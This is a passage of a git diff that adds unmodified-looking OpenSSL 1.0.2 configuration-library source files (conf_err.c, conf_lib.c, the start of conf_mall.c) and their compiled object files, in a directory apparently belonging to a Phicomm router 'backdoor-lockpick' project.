+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/conf.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_CONF,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_CONF,0,reason)
+
+static ERR_STRING_DATA CONF_str_functs[] = {
+    {ERR_FUNC(CONF_F_CONF_DUMP_FP), "CONF_dump_fp"},
+    {ERR_FUNC(CONF_F_CONF_LOAD), "CONF_load"},
+    {ERR_FUNC(CONF_F_CONF_LOAD_BIO), "CONF_load_bio"},
+    {ERR_FUNC(CONF_F_CONF_LOAD_FP), "CONF_load_fp"},
+    {ERR_FUNC(CONF_F_CONF_MODULES_LOAD), "CONF_modules_load"},
+    {ERR_FUNC(CONF_F_CONF_PARSE_LIST), "CONF_parse_list"},
+    {ERR_FUNC(CONF_F_DEF_LOAD), "DEF_LOAD"},
+    {ERR_FUNC(CONF_F_DEF_LOAD_BIO), "DEF_LOAD_BIO"},
+    {ERR_FUNC(CONF_F_MODULE_INIT), "MODULE_INIT"},
+    {ERR_FUNC(CONF_F_MODULE_LOAD_DSO), "MODULE_LOAD_DSO"},
+    {ERR_FUNC(CONF_F_MODULE_RUN), "MODULE_RUN"},
+    {ERR_FUNC(CONF_F_NCONF_DUMP_BIO), "NCONF_dump_bio"},
+    {ERR_FUNC(CONF_F_NCONF_DUMP_FP), "NCONF_dump_fp"},
+    {ERR_FUNC(CONF_F_NCONF_GET_NUMBER), "NCONF_get_number"},
+    {ERR_FUNC(CONF_F_NCONF_GET_NUMBER_E), "NCONF_get_number_e"},
+    {ERR_FUNC(CONF_F_NCONF_GET_SECTION), "NCONF_get_section"},
+    {ERR_FUNC(CONF_F_NCONF_GET_STRING), "NCONF_get_string"},
+    {ERR_FUNC(CONF_F_NCONF_LOAD), "NCONF_load"},
+    {ERR_FUNC(CONF_F_NCONF_LOAD_BIO), "NCONF_load_bio"},
+    {ERR_FUNC(CONF_F_NCONF_LOAD_FP), "NCONF_load_fp"},
+    {ERR_FUNC(CONF_F_NCONF_NEW), "NCONF_new"},
+    {ERR_FUNC(CONF_F_STR_COPY), "STR_COPY"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA CONF_str_reasons[] = {
+    {ERR_REASON(CONF_R_ERROR_LOADING_DSO), "error loading dso"},
+    {ERR_REASON(CONF_R_LIST_CANNOT_BE_NULL), "list cannot be null"},
+    {ERR_REASON(CONF_R_MISSING_CLOSE_SQUARE_BRACKET),
+     "missing close square bracket"},
+    {ERR_REASON(CONF_R_MISSING_EQUAL_SIGN), "missing equal sign"},
+    {ERR_REASON(CONF_R_MISSING_FINISH_FUNCTION), "missing finish function"},
+    {ERR_REASON(CONF_R_MISSING_INIT_FUNCTION), "missing init function"},
+    {ERR_REASON(CONF_R_MODULE_INITIALIZATION_ERROR),
+     "module initialization error"},
+    {ERR_REASON(CONF_R_NO_CLOSE_BRACE), "no close brace"},
+    {ERR_REASON(CONF_R_NO_CONF), "no conf"},
+    {ERR_REASON(CONF_R_NO_CONF_OR_ENVIRONMENT_VARIABLE),
+     "no conf or environment variable"},
+    {ERR_REASON(CONF_R_NO_SECTION), "no section"},
+    {ERR_REASON(CONF_R_NO_SUCH_FILE), "no such file"},
+    {ERR_REASON(CONF_R_NO_VALUE), "no value"},
+    {ERR_REASON(CONF_R_UNABLE_TO_CREATE_NEW_SECTION),
+     "unable to create new section"},
+    {ERR_REASON(CONF_R_UNKNOWN_MODULE_NAME), "unknown module name"},
+    {ERR_REASON(CONF_R_VARIABLE_HAS_NO_VALUE), "variable has no value"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_CONF_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(CONF_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, CONF_str_functs);
+        ERR_load_strings(0, CONF_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..bca3653572b267a80d7389b6ccf6111304676eae
GIT binary patch
literal 1368
zcmbtS%}T>S5S}#E`ctrq2SJhQMMb-`{vdjgLaAOvp-|{WLRw=hHc3ggpdR!Ud=wu+
z@FjeViZ?Gh)9l9WS`l<$GBaQ1o1fjiFCQN!3<IPXZ~$MCL;-4vFTdD#i;#v%c$->$
ze}<z{X+OJKt#>`%&F--+md_P-yZx|mx0z@8?X?JoByuyTBdA9wRlu@Ogqf%$vylPg
zwgSd=#+Xm1#vX7W!WYCp;{GPILlRy;hUJ+<H>4SqB^9C>Pp5$Bn*A*XF^WtW{SNl=
z)DJkFz@VftoKfbCcW(IJh2;bRYe2bDvD&_UZk0|?4y}*}mtHdzWwOH3Mgv>1@W$nK
z9T?_Ewk198TytROHn)M*!w^`*cU{Lr%=5X!@Vas#w;NX?ZhBqT3H*)|@Ec%()3%w@
zvMvJKbwu-jn0e&V9qK1p6gA`X5V8Jdmk=jRzAKRiW$9>E=da-ZG1R~EH;_v;^QfxG
z{_84;zU(jUj)JMF9W_vV$&(QEq1QHW_ZUll7JXG{S5?k1pqe`WK_uyW>HHez(W@?s
zd}&_9pmPEkM@w@`zQl+1Cdw0iP<oMp3A9v0=M$#i9Z?=d|78jk5pax5qc@D-6N$|@
IGjeqPCvl5VZ~y=R

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.c
new file mode 100644
index 0000000..5281384
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.c
@@ -0,0 +1,391 @@
+/* conf_lib.c */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/conf.h>
+#include <openssl/conf_api.h>
+#include <openssl/lhash.h>
+
+const char CONF_version[] = "CONF" OPENSSL_VERSION_PTEXT;
+
+static CONF_METHOD *default_CONF_method = NULL;
+
+/* Init a 'CONF' structure from an old LHASH */
+
+void CONF_set_nconf(CONF *conf, LHASH_OF(CONF_VALUE) *hash)
+{
+    if (default_CONF_method == NULL)
+        default_CONF_method = NCONF_default();
+
+    default_CONF_method->init(conf);
+    conf->data = hash;
+}
+
+/*
+ * The following section contains the "CONF classic" functions, rewritten in
+ * terms of the new CONF interface.
+ */
+
+int CONF_set_default_method(CONF_METHOD *meth)
+{
+    default_CONF_method = meth;
+    return 1;
+}
+
+LHASH_OF(CONF_VALUE) *CONF_load(LHASH_OF(CONF_VALUE) *conf, const char *file,
+                                long *eline)
+{
+    LHASH_OF(CONF_VALUE) *ltmp;
+    BIO *in = NULL;
+
+#ifdef OPENSSL_SYS_VMS
+    in = BIO_new_file(file, "r");
+#else
+    in = BIO_new_file(file, "rb");
+#endif
+    if (in == NULL) {
+        CONFerr(CONF_F_CONF_LOAD, ERR_R_SYS_LIB);
+        return NULL;
+    }
+
+    ltmp = CONF_load_bio(conf, in, eline);
+    BIO_free(in);
+
+    return ltmp;
+}
+
+#ifndef OPENSSL_NO_FP_API
+LHASH_OF(CONF_VALUE) *CONF_load_fp(LHASH_OF(CONF_VALUE) *conf, FILE *fp,
+                                   long *eline)
+{
+    BIO *btmp;
+    LHASH_OF(CONF_VALUE) *ltmp;
+    if (!(btmp = BIO_new_fp(fp, BIO_NOCLOSE))) {
+        CONFerr(CONF_F_CONF_LOAD_FP, ERR_R_BUF_LIB);
+        return NULL;
+    }
+    ltmp = CONF_load_bio(conf, btmp, eline);
+    BIO_free(btmp);
+    return ltmp;
+}
+#endif
+
+LHASH_OF(CONF_VALUE) *CONF_load_bio(LHASH_OF(CONF_VALUE) *conf, BIO *bp,
+                                    long *eline)
+{
+    CONF ctmp;
+    int ret;
+
+    CONF_set_nconf(&ctmp, conf);
+
+    ret = NCONF_load_bio(&ctmp, bp, eline);
+    if (ret)
+        return ctmp.data;
+    return NULL;
+}
+
+STACK_OF(CONF_VALUE) *CONF_get_section(LHASH_OF(CONF_VALUE) *conf,
+                                       const char *section)
+{
+    if (conf == NULL) {
+        return NULL;
+    } else {
+        CONF ctmp;
+        CONF_set_nconf(&ctmp, conf);
+        return NCONF_get_section(&ctmp, section);
+    }
+}
+
+char *CONF_get_string(LHASH_OF(CONF_VALUE) *conf, const char *group,
+                      const char *name)
+{
+    if (conf == NULL) {
+        return NCONF_get_string(NULL, group, name);
+    } else {
+        CONF ctmp;
+        CONF_set_nconf(&ctmp, conf);
+        return NCONF_get_string(&ctmp, group, name);
+    }
+}
+
+long CONF_get_number(LHASH_OF(CONF_VALUE) *conf, const char *group,
+                     const char *name)
+{
+    int status;
+    long result = 0;
+
+    if (conf == NULL) {
+        status = NCONF_get_number_e(NULL, group, name, &result);
+    } else {
+        CONF ctmp;
+        CONF_set_nconf(&ctmp, conf);
+        status = NCONF_get_number_e(&ctmp, group, name, &result);
+    }
+
+    if (status == 0) {
+        /* This function does not believe in errors... */
+        ERR_clear_error();
+    }
+    return result;
+}
+
+void CONF_free(LHASH_OF(CONF_VALUE) *conf)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    NCONF_free_data(&ctmp);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int CONF_dump_fp(LHASH_OF(CONF_VALUE) *conf, FILE *out)
+{
+    BIO *btmp;
+    int ret;
+
+    if (!(btmp = BIO_new_fp(out, BIO_NOCLOSE))) {
+        CONFerr(CONF_F_CONF_DUMP_FP, ERR_R_BUF_LIB);
+        return 0;
+    }
+    ret = CONF_dump_bio(conf, btmp);
+    BIO_free(btmp);
+    return ret;
+}
+#endif
+
+int CONF_dump_bio(LHASH_OF(CONF_VALUE) *conf, BIO *out)
+{
+    CONF ctmp;
+    CONF_set_nconf(&ctmp, conf);
+    return NCONF_dump_bio(&ctmp, out);
+}
+
+/*
+ * The following section contains the "New CONF" functions.  They are
+ * completely centralised around a new CONF structure that may contain
+ * basically anything, but at least a method pointer and a table of data.
+ * These functions are also written in terms of the bridge functions used by
+ * the "CONF classic" functions, for consistency.
+ */
+
+CONF *NCONF_new(CONF_METHOD *meth)
+{
+    CONF *ret;
+
+    if (meth == NULL)
+        meth = NCONF_default();
+
+    ret = meth->create(meth);
+    if (ret == NULL) {
+        CONFerr(CONF_F_NCONF_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+
+    return ret;
+}
+
+void NCONF_free(CONF *conf)
+{
+    if (conf == NULL)
+        return;
+    conf->meth->destroy(conf);
+}
+
+void NCONF_free_data(CONF *conf)
+{
+    if (conf == NULL)
+        return;
+    conf->meth->destroy_data(conf);
+}
+
+int NCONF_load(CONF *conf, const char *file, long *eline)
+{
+    if (conf == NULL) {
+        CONFerr(CONF_F_NCONF_LOAD, CONF_R_NO_CONF);
+        return 0;
+    }
+
+    return conf->meth->load(conf, file, eline);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int NCONF_load_fp(CONF *conf, FILE *fp, long *eline)
+{
+    BIO *btmp;
+    int ret;
+    if (!(btmp = BIO_new_fp(fp, BIO_NOCLOSE))) {
+        CONFerr(CONF_F_NCONF_LOAD_FP, ERR_R_BUF_LIB);
+        return 0;
+    }
+    ret = NCONF_load_bio(conf, btmp, eline);
+    BIO_free(btmp);
+    return ret;
+}
+#endif
+
+int NCONF_load_bio(CONF *conf, BIO *bp, long *eline)
+{
+    if (conf == NULL) {
+        CONFerr(CONF_F_NCONF_LOAD_BIO, CONF_R_NO_CONF);
+        return 0;
+    }
+
+    return conf->meth->load_bio(conf, bp, eline);
+}
+
+STACK_OF(CONF_VALUE) *NCONF_get_section(const CONF *conf, const char *section)
+{
+    if (conf == NULL) {
+        CONFerr(CONF_F_NCONF_GET_SECTION, CONF_R_NO_CONF);
+        return NULL;
+    }
+
+    if (section == NULL) {
+        CONFerr(CONF_F_NCONF_GET_SECTION, CONF_R_NO_SECTION);
+        return NULL;
+    }
+
+    return _CONF_get_section_values(conf, section);
+}
+
+char *NCONF_get_string(const CONF *conf, const char *group, const char *name)
+{
+    char *s = _CONF_get_string(conf, group, name);
+
+    /*
+     * Since we may get a value from an environment variable even if conf is
+     * NULL, let's check the value first
+     */
+    if (s)
+        return s;
+
+    if (conf == NULL) {
+        CONFerr(CONF_F_NCONF_GET_STRING,
+                CONF_R_NO_CONF_OR_ENVIRONMENT_VARIABLE);
+        return NULL;
+    }
+    CONFerr(CONF_F_NCONF_GET_STRING, CONF_R_NO_VALUE);
+    ERR_add_error_data(4, "group=", group, " name=", name);
+    return NULL;
+}
+
+int NCONF_get_number_e(const CONF *conf, const char *group, const char *name,
+                       long *result)
+{
+    char *str;
+
+    if (result == NULL) {
+        CONFerr(CONF_F_NCONF_GET_NUMBER_E, ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    str = NCONF_get_string(conf, group, name);
+
+    if (str == NULL)
+        return 0;
+
+    for (*result = 0; conf->meth->is_number(conf, *str);) {
+        *result = (*result) * 10 + conf->meth->to_int(conf, *str);
+        str++;
+    }
+
+    return 1;
+}
+
+#ifndef OPENSSL_NO_FP_API
+int NCONF_dump_fp(const CONF *conf, FILE *out)
+{
+    BIO *btmp;
+    int ret;
+    if (!(btmp = BIO_new_fp(out, BIO_NOCLOSE))) {
+        CONFerr(CONF_F_NCONF_DUMP_FP, ERR_R_BUF_LIB);
+        return 0;
+    }
+    ret = NCONF_dump_bio(conf, btmp);
+    BIO_free(btmp);
+    return ret;
+}
+#endif
+
+int NCONF_dump_bio(const CONF *conf, BIO *out)
+{
+    if (conf == NULL) {
+        CONFerr(CONF_F_NCONF_DUMP_BIO, CONF_R_NO_CONF);
+        return 0;
+    }
+
+    return conf->meth->dump(conf, out);
+}
+
+/* This function should be avoided */
+#if 0
+long NCONF_get_number(CONF *conf, char *group, char *name)
+{
+    int status;
+    long ret = 0;
+
+    status = NCONF_get_number_e(conf, group, name, &ret);
+    if (status == 0) {
+        /* This function does not believe in errors... */
+        ERR_get_error();
+    }
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..c3e69c96fc5aefbf25146e549e0ea6c5a6d8f106
GIT binary patch
literal 7488
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.c
new file mode 100644
index 0000000..b4dbd66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/conf/conf_mall.c
@@ -0,0 +1,81 @@
+/* conf_mall.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
